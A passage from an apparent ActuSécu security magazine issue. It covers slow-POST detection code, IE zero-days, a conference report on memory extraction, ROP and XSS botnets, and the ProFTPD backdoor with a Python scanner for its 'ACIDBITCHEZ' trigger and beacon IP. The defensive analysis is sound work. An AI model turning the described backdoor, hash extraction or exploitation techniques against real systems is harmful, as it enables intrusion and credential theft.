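        return sum(n for ts, n in self.chunks if ts <= now)


def classify(transfer: BodyTransfer, now: float, min_rate: float = 1024.0,
             grace: float = 10.0, max_body_time: float = 60.0) -> str:
    """Verdict for one transfer: "ok", "slow_body" or "excessive_time".

    A slow POST announces a large body and then sends a few bytes just often
    enough to beat the idle timeout, so a per-packet timeout never fires.
    Judging the body's average rate and its projected completion time
    catches it while leaving short or bursty legitimate uploads alone.
    """
    elapsed = now - transfer.started_at
    got = transfer.received(now)
    if got >= transfer.content_length or elapsed < grace:
        return "ok"
    rate = got / elapsed
    if rate < min_rate:
        return "slow_body"
    if elapsed + (transfer.content_length - got) / rate > max_body_time:
        return "excessive_time"
    return "ok"


def offending_clients(transfers, now: float, per_client_limit: int = 2,
                      **thresholds) -> dict:
    """Count abusive transfers per client IP and keep the clients at or above
    per_client_limit: the attack needs many such connections from few sources."""
    bad = Counter(t.client_ip for t in transfers
                  if classify(t, now, **thresholds) != "ok")
    return {ip: n for ip, n in bad.items() if n >= per_client_limit}


# Constructed sample: one normal upload and several trickling bodies.
SAMPLE = [
    BodyTransfer("10.0.0.5", 200_000, 0.0,
                 [(0.5, 50_000), (1.0, 50_000), (1.5, 50_000), (2.0, 50_000)]),
] + [
    BodyTransfer("203.0.113.7", 1_000_000, 0.0,
                 [(9.0 * k, 10) for k in range(1, 7)])   # 10 bytes every 9 s
    for _ in range(3)
] + [
    # Fast enough to pass the rate test, but 5 MB at this pace takes an hour.
    BodyTransfer("203.0.113.7", 5_000_000, 0.0,
                 [(10.0, 20_480), (20.0, 20_480), (30.0, 20_480), (40.0, 20_480)]),
]

if __name__ == "__main__":
    for t in SAMPLE:
        print(t.client_ip, t.content_length, classify(t, now=60.0))
    print(offending_clients(SAMPLE, now=60.0))
```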



CSS History Hack In Firefox Without JavaScript for Intranet Portscanning (Robert "RSnake" Hansen)
As usual, Robert Hansen, alias "RSnake", comes within the top 10. This researcher and author of the ha.ckers site showed how to use the CSS history to identify internal IP addresses previously visited by a user. The CSS history is a subject addressed several times by RSnake. The aim is to be able to identify the sites visited by an Internet user based on the CSS properties of the history, without using any JavaScript code.

References
CERT-XMCO references: CXA-2010-1178, CXA-2010-0916, CXA-2010-0502, CXA-2010-1621
http://jeremiahgrossman.blogspot.com/2011/01/top-ten-web-hacking-techniques-of-2010.html
Padding Oracle: http://usenix.org/events/woot10/tech/full_papers/Rizzo.pdf
Evercookie: http://samy.pl/evercookie/
Hacking Auto-Complete: http://jeremiahgrossman.blogspot.com/2010/08/breaking-browsers-hacking-auto-complete.html, http://blackhat.com/html/bh-us-10/bh-us-10-briefings.html#Grossman
Attacking HTTPS with Cache Injection: http://www.youtube.com/watch?v=bt0Qh9c59_c, http://elie.im/talks/bad-memories
Bypassing CSRF protections with ClickJacking and HTTP Parameter Pollution: http://blog.andlabs.org/2010/03/bypassing-csrf-protections-with.html
Universal XSS in IE8: http://p42.us/ie8xss/, http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1489, http://bit.ly/fmSNzA
HTTP POST DoS: http://www.darkreading.com/vulnerability-management/167901026/security/attacks-breaches/228000532/index.html
JavaSnoop: http://www.aspectsecurity.com/tools/javasnoop/
CSS History Hack In Firefox Without JavaScript for Intranet Portscanning: http://ha.ckers.org/blog/20100125/css-history-hack-in-firefox-without-javascript-for-intranet-portscanning/
Java Applet DNS Rebinding: http://blog.mindedsecurity.com/2010/10/java-dsn-rebinding-java-same-ip-policy.html


Microsoft and IE

Let's import video clips!

Microsoft had a difficult year end with the discovery of several critical vulnerabilities affecting Internet Explorer. A vulnerability of the zero-day type was discovered within the Internet Explorer browser (versions 6, 7 and 8). It results from an error in the management of the "clip" attribute by the shared library mshtml.dll. Microsoft reacted by publishing the security bulletin referenced KB2458511 (CVE-2010-3962), then the bulletin MS10-090. Several weeks later, a new zero-day! This time, the second vulnerability came from a handling error when importing CSS styles, within the same shared library mshtml.dll. By getting a user to open a malicious web page, a pirate was able to corrupt the memory and take control of the target system. Exploitation of this vulnerability required the use of the "heap spray" technique so that the pirate could be sure of executing their malicious code. This critical vulnerability (CVE-2010-3971) did not cause much of a reaction on the Internet. Although Microsoft took no less than two months to correct this major problem, pirates did not really exploit this vulnerability, although it affected all versions of Internet Explorer (6, 7 and 8). The difficulty lay in the circumvention of DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization). Although HD Moore quickly published a first exploit within Metasploit, this was not reliable in all environments.

Microsoft alerted its clients (KB2488013) then, in February, corrected this vulnerability with bulletin MS11-003.

INFO
Exploiting an IE vulnerability via an alternative browser
Billy Rios, the famous security researcher, has just published an article presenting an attack vector that is interesting for exploiting the latest zero-day vulnerability in Internet Explorer. Using an alternative browser and Adobe Reader, it is possible to exploit this vulnerability. The PDF language allows the use of an API method called "app.launchURL()". This function takes a URL that will be opened by the default browser. Consequently, a malicious PDF opened with an alternative browser such as Firefox would cause a predefined URL to be opened with the default browser (Internet Explorer). The users of this browser are therefore exposed to the exploitation of a vulnerability affecting Internet Explorer.

A proof of concept was put online on the researcher's blog: http://xs-sniper.com/sniperscope/Adobe/BounceToIE.pdf

References:
CERT-XMCO references: CXA-2010-1724, CXA-2010-1736, CXA-2010-1785, CXA-2010-1808, CXA-2010-1828, CXA-2010-1830, CXA-2011-0197
CVE references: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-3962, http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-3971
Microsoft references: http://www.microsoft.com/technet/security/advisory/2458511.mspx, http://www.microsoft.com/france/technet/security/bulletin/ms10-090.mspx, http://www.microsoft.com/technet/security/advisory/2488013.mspx, http://www.microsoft.com/technet/security/bulletin/MS11-003.mspx
Other references: http://www.wooyun.org/bugs/wooyun-2010-0885, http://seclists.org/fulldisclosure/2010/Dec/110, http://xcon.xfocus.net/XCon2010_ChenXie_EN.pdf, http://www.breakingpointsystems.com/community/blog/ie-vulnerability/


The GS DAYS 2010

Last 30 November, the second edition of GS Days took place in the Espace Saint Martin, in the very heart of Paris. This conference is a meeting place for two communities that are usually separate: researchers and other technicians on one side, and decision-makers on the other. Sixteen conferences took place, covering technical, legal and organizational subjects. They allowed the 260 French-speaking participants to (re)discover numerous aspects related to security. Although all of these conferences were enticing, we had to make a selection. After a breakfast that brought together all participants around the stands belonging to the various partners of the event, Marc Brahmi quickly introduced the event. This speech was the occasion to announce to participants the date of the third edition of GS Days. This will take place on 10 May 2011, in the Espace Saint Martin.

From legal to technical: putting one finger up to hacking (Diane Mullenex, Legal Practitioner; Paul Such, SCRT; Philippe Humeau, NBS System)
SCRT and NBS were respectively represented by Paul Such and Philippe Humeau. They were accompanied by Diane Mullenex, who is a legal practitioner. They began the day with an opening keynote address entitled "From legal to technical: putting one finger up to hacking!". Unfortunately, this introduction had to be cut short due to lack of time. This plenary session presented several points such as post-incident analysis (the context, the aim, prior questions, submission of a disk before a court and analysis of the memory), and that of catching someone in the act. The speakers, from technical and legal backgrounds, presented the main stages in preparing a legally admissible technical case, and the main errors that are easy to make. Even so, the conclusion was that few cases get as far as trial: currently, most of them are concluded by a privately negotiated arrangement.

H@ckRAM (Arnaud Malard - Devoteam)
Subsequently, during the H@ckRAM conference, Arnaud Malard, a consultant at Devoteam, listed and described the various techniques for exploiting the content of a system's live memory. These techniques concern two contexts in particular: the post-mortem study and the attack on a system. This conference has the merit of presenting an overview of existing tools and techniques for accomplishing the objectives, which are: the extraction, analysis and manipulation of data contained in RAM.

Firstly, Arnaud Malard presented the various contexts from which it is possible to extract the content of this memory: live, from the file hiberfil.sys during prolonged hibernation, from a "crashdump" following a crash, by using the DMA mechanism that is mainly used by the FireWire and PCMCIA/PC Card protocols, from a virtual machine of the VMware type and lastly, by carrying out a "coldboot" attack. After this first part, Arnaud gave a quick demonstration of the "memdump" script supplied within the Metasploit framework. Then he presented the various existing tools for analyzing all the information that is recovered in this way.

After that, he listed certain sensitive data that could be obtained in this manner, such as BIOS passwords, LM/NTLM hashes, the SAM database and LSA secrets, the passwords recorded by browsers and other fat clients and even the AES/RSA keys used by encryption solutions such as TrueCrypt. Lastly, the consultant showed several videos presenting the dangers associated with the control of live memory: an elevation of privileges of a process from a serial port, then the misappropriation of the Windows authentication process through the modification of two opcodes following a signature, via a modification of the hiberfil.sys file, as well as via the DMA mechanism. In spite of a small question that remained unanswered on the estimate of the disruption to the content of live memory caused by exploiting a process, the consultant met all the expectations of his audience.

Return Oriented Programming (Jean-Baptiste Aviat - HSC)
Afterwards, Jean-Baptiste Aviat, from the consultancy HSC, presented a conference entitled "Return Oriented Programming: reminder and practice". This conference was very educational. It clarified concepts that are often mentioned in the news but rarely defined. After a quick presentation of the "basic" stack overflow and existing protection measures (canary, DEP/NX bit), the consultant introduced the "Return into Libc" method, which can bypass these protection functions. After this, the researcher presented various technical solutions that developers use to protect themselves against this attack technique (compilation without dangerous functions, compiling these functions so that their addresses contain 0x00, and the implementation of ASLR (Address Space Layout Randomization)). The researcher ended by presenting what is the current ultimate circumvention: ROP (Return Oriented Programming). This technique, which is usable when at least one library is not loaded with ASLR, is based on the use of "gadgets". Each of these pieces of assembler code has two characteristics: a unique address, and a "ret" instruction that terminates the instructions. Using these, it is possible to write the different addresses of the gadgets beyond the buffer in order to chain their calls using "ret". Each of these gadgets will be responsible for a very specific task, in order to copy malicious code into an NX zone, transform this non-executable zone into an executable zone and lastly, to execute the code.

INFO
GS DAYS returns
After the success of the first two editions, GS DAYS will very soon return on 10 May 2011, from 08:30 to 18:00 at the Espace Saint Martin. This third edition will address the following subjects:
- The security of industrial systems and networks
- The efficient use of connection data
- Dualistic use of workstations
The call for papers has already been launched.

Contact and information: http://www.gsdays.fr/


The security of Android (Nicolas Ruff - EADS)
After a long break for lunch, the researcher Nicolas Ruff from EADS led a conference on the security of the Android ecosystem. This very personal presentation gave the audience a quick introduction to the market context of smartphones, its architecture, the security mechanism of its operating system and its limits. Nicolas will return to the SSTIC with the same subject, doubtless with more material, and we hope for some demonstrations!

RFID: Radio Frequency Insecure Device (Sergio Domingues - SCRT)
A conference entitled "RFID: Radio Frequency Insecure Device?" was then given by Sergio Alves Domingues from SCRT. After a quick presentation of the characteristics specific to RFID systems, the researcher gave a case study on the EM410X system. This is supposed to provide proven security because it is available solely in "read-only" mode and it contains only a single identifier, according to the manufacturer. However, the researcher showed what it was possible to do according to three attack models: collision, cloning and emulation. The large number of bits (40) over which the unique identifier is coded makes collision difficult. Nevertheless, using cloning and emulation, it is extremely simple to create an apparent copy of this autonomous system. The researcher presented a "copier", which could be bought for a few dollars on the Internet. Lastly, he ended his conclusion by presenting a "hand-made" circuit for simulating a specific autonomous RFID system, using a roll of toilet paper as an antenna support. The researcher concluded his presentation by stating that speaking of the security of an RFID system could mean anything or nothing. It is important to know what a given system allows to be done, so as not to have a false impression of security.

Telecommuting: the frontier between private and public life (Catherine Duval and Yann Fareau - Devoteam)
The following conference was led by Catherine Duval and Yann Fareau. It was entitled "Telecommuting: the frontier between private and public life". Between social, legal and environmental developments, this long appraisal of telecommuting in France gave a complete presentation of the major issues associated with this new way of working. The various components (managerial, legal and practical) were reviewed.

XSSF: demonstrating the danger of XSS (Ludovic Courgnaud and Imad Abounasr - Conix)
The final technical conference, called "XSSF: demonstrating the danger of XSS", caused quite a reaction in the audience. Firstly, the two consultants from Conix, Ludovic Courgnaud and Imad Abounasr, presented the risks associated with the exploitation of vulnerabilities of the XSS type, and the low importance that is still associated with them. Then they spoke of XSSF, a tool specially developed for this. This framework is based on Metasploit. Just like BeEF, it allows control to be taken of systems by exploiting vulnerabilities present in the operating system (e.g. hcp, LNK), in the web browser, or in its plug-ins, simply by using JavaScript to force a browser to execute certain actions. This stage can control a set of bots that can be used subsequently. For example, pirates could use it as a relay for carrying out attacks. The two consultants showed how easy it was to go from an XSS on the site belonging to Norton/Symantec to the construction of a genuine botnet. The presentation ended with a discussion between consultants and decision-makers on the legality of a French company making the code for a "hacking" tool available.

Other conferences
Finally, the day ended with lessons learned, jointly presented by France Paris and EdelWeb. The conference "Integrating security into a project with significant regulatory, technical and timetable constraints: lessons learned from online games" presented the management of each stage by both parties, from the definition to the implementation of an online game platform accredited by ARJEL.


Conclusion
This second edition of GS Days was particularly interesting. The conferences were of an excellent level and the days were very well organized. The GS Days compare well with other international conferences.

References
Website and information: http://www.gsdays.fr/


PROFTPD ATTACK

Servers belonging to ProFTPD compromised!

During November, attackers broke into the servers hosting the ProFTPD project. The attack was carried out on 28 November 2010 by exploiting a vulnerability that has still not been disclosed. The attackers took advantage of this intrusion to replace the source code of ProFTPD version 1.3.3c with a version containing a backdoor.

The HELP ACIDBITCHEZ backdoor

The code added by the attackers gives root access to any system on which the trojaned ProFTPD is installed. For this, the attackers added one file to the source tree and modified another:

Addition of the file tests/test.c
This file was added to the source tree. When the backdoored version of ProFTPD is compiled, a request is sent to a server in Saudi Arabia (212.26.42.47) to notify the attackers that a new target exists.

Modification of the file src/help.c
The file help.c was modified with a few lines of code so that simply issuing the FTP command "HELP ACIDBITCHEZ" gives an attacker a shell directly and control of the server. Since HELP is accepted before authentication, no credentials are needed.

Zero-day or not zero-day

But how did the attackers get into these servers? The question remains unanswered.

The first hypothesis is the exploitation of a zero-day vulnerability. One question then remains: why would the attackers have burned this vulnerability on the publisher's own servers, at the risk of the administrators discovering it, when they could have used it massively against every ProFTPD server exposed on the Internet?



The second hypothesis is the exploitation of a vulnerability published at the same time in Phrack issue 67. It affects versions prior to 1.3.3d and 1.3rc1 and results from an error in the function sql_prepare_where() of the SQL module (mod_sql). By sending specially crafted packets, an attacker could trigger a buffer overflow and take control of a system running ProFTPD with this module.

Neither of these two hypotheses was confirmed, and the developers did not wish to reveal more.

References
CERT-XMCO references: CXA-2010-1692, CXA-2010-1680, CXA-2010-1673
http://www.phrack.org/issues.html?issue=67&id=7#article
http://xorl.wordpress.com/2010/12/02/news-proftpd-owned-and-backdoored/

Consequences...
As a result, every copy downloaded between 28 November and 2 December contained the malicious code. No figure was communicated on the number of downloads of this version, which was available for five days.


If you have any doubts, we strongly advise you to search for the character string ACIDBITCHEZ in your ProFTPD binary and in any source tree you compiled it from, and, if necessary, to download the latest published version (1.3.3d or 1.3rc1). Since the attackers replaced the archives on the project's own servers, verify the checksum and PGP signature of the downloaded archive rather than trusting the archive alone.
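The check above, carried through as an added example that is not code from the article, from ProFTPD or from the attackers' patch: the Python script below scans a compiled proftpd binary or an unpacked source tree offline for the two indicators the article gives, the "ACIDBITCHEZ" trigger word and the beacon address 212.26.42.47. The directory layout and file contents built in demo() are constructed for the example and are not the real backdoor code.

```python
"""Offline check for the ProFTPD 1.3.3c backdoor indicators described in this article.

Added example for this article, not code from ProFTPD or from the attackers' patch.
It searches files for the two indicators the article gives: the "HELP ACIDBITCHEZ"
trigger word inserted into src/help.c and the beacon host 212.26.42.47 contacted
by the compile-time hook in tests/test.c.
"""
import os
import tempfile

# Indicators taken from the article. Matching is done on raw bytes so the same
# function works on a compiled proftpd binary and on an unpacked source tree.
INDICATORS = {
    "help-trigger": b"ACIDBITCHEZ",   # trigger word added to src/help.c
    "beacon-host": b"212.26.42.47",   # server notified when the trojaned tree is compiled
}


def scan_bytes(data):
    """Return the names of the indicators present in a blob, in dictionary order."""
    return [name for name, needle in INDICATORS.items() if needle in data]


def scan_tree(root):
    """Walk a directory (source tree or install prefix) and map each suspicious
    file, as a POSIX-style path relative to root, to the indicators found in it."""
    findings = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for filename in filenames:
            path = os.path.join(dirpath, filename)
            try:
                with open(path, "rb") as handle:
                    hits = scan_bytes(handle.read())
            except OSError:
                continue  # unreadable entry (permissions, dangling link): skip, do not abort
            if hits:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings[rel] = hits
    return findings


def demo():
    """Scan a constructed, fictitious layout: a clean main.c, a help.c carrying the
    trigger, a test.c carrying the beacon address and a binary stub with the
    trigger. The file contents are invented for this example; they are not the
    attackers' code."""
    with tempfile.TemporaryDirectory() as root:
        samples = {
            "src/main.c": b"/* constructed sample: nothing suspicious */\nint main(void) { return 0; }\n",
            "src/help.c": b'/* constructed sample */\nif (strcmp(arg, "ACIDBITCHEZ") == 0) { /* ... */ }\n',
            "tests/test.c": b'/* constructed sample */\nconst char *host = "212.26.42.47";\n',
            "sbin/proftpd": b"\x7fELF" + b"\x00" * 16 + b"HELP ACIDBITCHEZ\x00",
        }
        for rel, content in samples.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as handle:
                handle.write(content)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, hits in sorted(demo().items()):
        print(f"{rel}: {', '.join(hits)}")
```

Point scan_tree() at the directory holding your proftpd binary or at the unpacked tarball. A hit on the trigger string in the binary, or on either indicator in the source tree, means that copy must be discarded; the beacon address only ever appears in the source, since the hook runs at build time and is not part of the server binary.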


Our bookmarks, blogs and favorite tools

Adrien GUINAULT

With each publication, in this section, we present free tools, Firefox extensions and our favorite websites.

For this edition, we have chosen to present two auditing tools that are useful for PCI DSS audits (including the IMA program), a blog and our top Twitter profiles.

On the agenda for this edition:
* IMA: Identity Management Auditor, an auditing tool developed by Yannick Hamon, consultant at XMCO.
* VMware Compliance Checker: tool for testing VMware environments for PCI DSS certification.
* The blog m_101: security blog specialized in the presentation of vulnerabilities and solutions to challenges.
* Top Twitter: a selection of Twitter accounts followed by CERT-XMCO.


IMA
Auditing permissions for systems and databases

Description
IMA is a program developed by Yannick Hamon, a consultant at XMCO. It performs permission audits on MSSQL, Oracle, Active Directory and Lotus Domino. The tool can quickly identify user profiles (administrators, DBAs, etc.) and test the robustness of the passwords of all accounts.

How many times have you manually connected with osql to an MSSQL database to extract the hashes, then passed them to John the Ripper? With IMA, one click is sufficient. Whether through local or domain authentication, IMA recovers, audits, then reports the results in a directly usable format (Excel, graph). It has several very useful functions: import of .pot files (John the Ripper), export in different formats, Pass-the-Hash, password generators and SQL clients. Let's hope IMA becomes the reference for security auditors!

Address
http://www.xmco.fr/ima.html

XMCO opinion
IMA has become an essential tool for our security audits, particularly when it is necessary to audit dozens of Oracle and MSSQL databases or to check permissions on an Active Directory instance. As the tool is developed and maintained in the author's free time, he apologizes in advance for any bugs. Do not hesitate to report them or to suggest new functionalities. For us, it is the best freeware of its kind ;-)


VMware Compliance Checker
Auditing Windows systems

Description
VMware Compliance Checker is a very useful tool for auditing Windows systems during PCI DSS audits. It reports the essential security points of a Windows system for meeting the requirements imposed by the PCI DSS 1.2 standard: presence of a personal firewall, unnecessary services, permissions, logs, password policy, etc.

Address
http://www.vmware.com/products/compliance-checker/

XMCO opinion
Combined with a tool such as MBSA for security patches, this tool checks that a Windows system complies with basic security principles.


m_101
Technical blog specialized in the exploitation of vulnerabilities

Description
Let's stay in the spirit of our rather technical article on the exploitation of Windows and Linux security vulnerabilities with the blog m_101. This blog, written by a student with a keen interest in security, lets you follow and understand the resolution of challenges and the exploitation of vulnerabilities.

Address
Link: http://binholic.blogspot.com/
Twitter: http://twitter.com/w_levin

XMCO opinion
This blog will let you perfect your technical knowledge in highly varied fields, from the exploitation of Windows vulnerabilities to partial solutions of challenges. An excellent blog for an informed audience.

Twitter
Selection of Twitter accounts followed by CERT-XMCO

Account            URL                                     Type
Regvulture         http://twitter.com/regvulture           General info
honlinenews        http://twitter.com/honlinenews          Security info
helpnet            http://twitter.com/helpnetsecurity      Security info
hdmoore            http://twitter.com/hdmoore              Metasploit
xanda              http://twitter.com/xanda                Technical
CERT_Polska_en     http://twitter.com/CERT_Polska_en       Security info
schneierblog       http://twitter.com/schneierblog         Security info
taviso             http://twitter.com/taviso               Technical
ivanlef0u          http://twitter.com/ivanlef0u            Technical
msftsecresponse    http://twitter.com/msftsecresponse/     Security info


Acknowledgements...

Cover
* David Helan (davidhelan): http://helmen.blogspot.com/ http://www.flickr.com/photos/davidhelan/3443012216/

Photos of articles
* Karsten Kneese (karstenkneese): http://www.flickr.com/photos/karstenkneese/
* Trey Ratcliff (stuckincustoms): http://www.flickr.com/photos/stuckincustoms/
* Ludo Benoit (pics_troy): http://www.flickr.com/photos/pics_troy/
* Bjoern Schwarz (bagalute): http://www.flickr.com/people/bagalute/
* Shelly Munkberg (zingersb): http://www.flickr.com/photos/zingersb/
* Stfan Le D (st3f4n): http://www.flickr.com/photos/st3f4n/
* Jon (xlibber): http://www.flickr.com/photos/xlibber/
* Wade Kelly (wader): http://www.flickr.com/photos/wader/
* emdot: http://www.flickr.com/photos/emdot/
* Michael LaCalameto (stopthegears): http://www.flickr.com/photos/stopthegears/
* Rob Shenk (rcsj): http://www.flickr.com/photos/rcsj/
* -JvL- (-jlv-): http://www.flickr.com/people/-jvl-/
* Gordon (judeanpeoplesfront): http://www.flickr.com/photos/judeanpeoplesfront/
* Sharon Pruitt (pinksherbet): http://www.flickr.com/photos/pinksherbet/
* Daniel Horacio (dhammza): http://www.flickr.com/photos/dhammza
* Saad Irfan (saadirfan): http://www.flickr.com/photos/saadirfan/
* Jeff Keyzer (mightyohm): http://www.flickr.com/photos/mightyohm/
* Vanessa Lynn (vanessa_lynn): http://www.flickr.com/photos/vanessa_lynn/
* BlackburnMike_1 / Mike Blackburn: http://www.flickr.com/photos/mikeblackburn/
* Nick Fisher (cobrasick): http://www.flickr.com/photos/cobrasick/
* The Consumerist: http://www.flickr.com/photos/consumerist/
* Shorts and Longs | The Both And (48424574@N07/): http://www.flickr.com/photos/48424574@N07
* AlaskaTeacher (alstonfamily): http://www.flickr.com/photos/alstonfamily/
* Exakta: http://www.flickr.com/photos/exakta/
* Seth Anderson (swanksalot): http://www.flickr.com/photos/swanksalot/3820698076/sizes/z/in/photostream/ http://www.b12partners.net/wp/


About ActuSécu
ActuSécu is a digital magazine written and published by the consultants of the XMCO Partners consultancy. Its purpose is to give clear and detailed presentations on IT security in complete independence. All editions of ActuSécu can be downloaded from the following address (French and English versions): http://www.xmco.fr/actualite-securite-vulnerabilite-fr.html

About XMCO Partners
Founded in 2002 by experts in security and managed by its founders, we work in the form of fixed-fee projects with a commitment to achieve results. Intrusion tests, PCI DSS security audits and vulnerability monitoring (CERT-XMCO) are the major areas in which our firm is developing. At the same time, we work with senior management on assignments providing support to heads of information-systems security, in drawing up master plans and in working on awareness-raising seminars with several large French accounts.

Contact XMCO Partners
To contact XMCO Partners and obtain information about our business: +33 (0)01 47 34 68 61.

http://www.xmco.fr
http://cert.xmco.fr
